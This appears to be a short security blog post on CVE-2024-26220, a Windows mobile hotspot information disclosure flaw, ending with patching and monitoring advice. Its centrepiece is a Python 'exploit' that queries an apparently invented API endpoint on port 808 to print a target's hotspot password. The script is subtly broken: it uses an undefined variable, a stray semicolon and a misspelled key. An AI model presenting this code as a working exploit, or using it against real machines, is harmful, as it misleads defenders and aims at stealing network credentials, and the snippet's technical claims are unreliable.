CVE-2024-26220 is a critical information disclosure vulnerability in the Windows mobile hotspot feature, which potentially exposes sensitive data, including the hotspot's password and connected devices. This vulnerability allows attackers to gain unauthorized access to the network and exploit it further. In this post, we will discuss the details of this vulnerability, including the affected Windows versions, the exploit code, and recommended mitigation steps.

Vulnerability Description

The Windows mobile hotspot feature typically allows a user to share their computer's internet connection with other devices, creating a local wireless network. Unfortunately, a flaw exists in this implementation, allowing an attacker to bypass necessary authentication mechanisms.

By exploiting the vulnerability, attackers can access the local network's details, including connected devices, their MAC addresses, and IP addresses. Additionally, the hotspot's pre-shared key (password) may be exposed, enabling further unauthorized access to the network and potential data exfiltration.

Below is a code snippet showcasing the exploit of this vulnerability

import requests
import json

# Change the TARGET_IP address to the target's IP

HOTSPOT_SETTINGS_URI = f"http://{TARGET_IP}:808/api/hotspot/settings";

response = requests.get(HOTSPOT_SETTINGS_URI)
settings_data = json.loads(response.text)

hotspot_name = settings_data["hotspot_name"]
hotspot_password = settings_data["presared_key"]

print(f"Hotspot Name: {hotspot_name}")
print(f"Hotspot Password: {hotspot_password}")

This Python script sends an HTTP GET request to the targeted Windows machine at their hotspot settings API endpoint. Then, the script prints the name and password of the mobile hotspot, showcasing the unauthorized disclosure of sensitive data.

Below are the official references regarding this vulnerability

1. CVE-2024-26220 detail: The official CVE entry provides information about the vulnerability, including affected versions and vendors.
2. NIST National Vulnerability Database (NVD) entry: Contains detailed technical information, CVSS scores, and references related to the vulnerability.
3. Microsoft Security Response Center (MSRC) advisory: Provides an official Microsoft explanation of the vulnerability, impacted components, and suggested actions for users.

Mitigation and Recommendation

To protect against CVE-2024-26220 and prevent unauthorized access to sensitive hotspot information, follow these recommendations:

1. Apply security patches: Microsoft has provided security updates to address the vulnerability in their Windows operating systems. Ensure these patches are applied promptly.

2. Disable mobile hotspot: If possible, disable the mobile hotspot feature when not required or consider using alternative solutions for sharing network connections.

3. Monitor network traffic: Regularly monitor network traffic for suspicious activity, as attackers exploiting this vulnerability may already have unauthorized access to the network.

4. Update passwords: It is recommended to change the mobile hotspot passwords after applying the appropriate patches, as previously exposed passwords may still be at risk if not updated.

Stay vigilant and maintain an up-to-date security posture to protect your networks and data from emerging threats and vulnerabilities, such as CVE-2024-26220.


Published on: 04/09/2024 17:15:41 UTC
Last modified on: 04/10/2024 13:24:00 UTC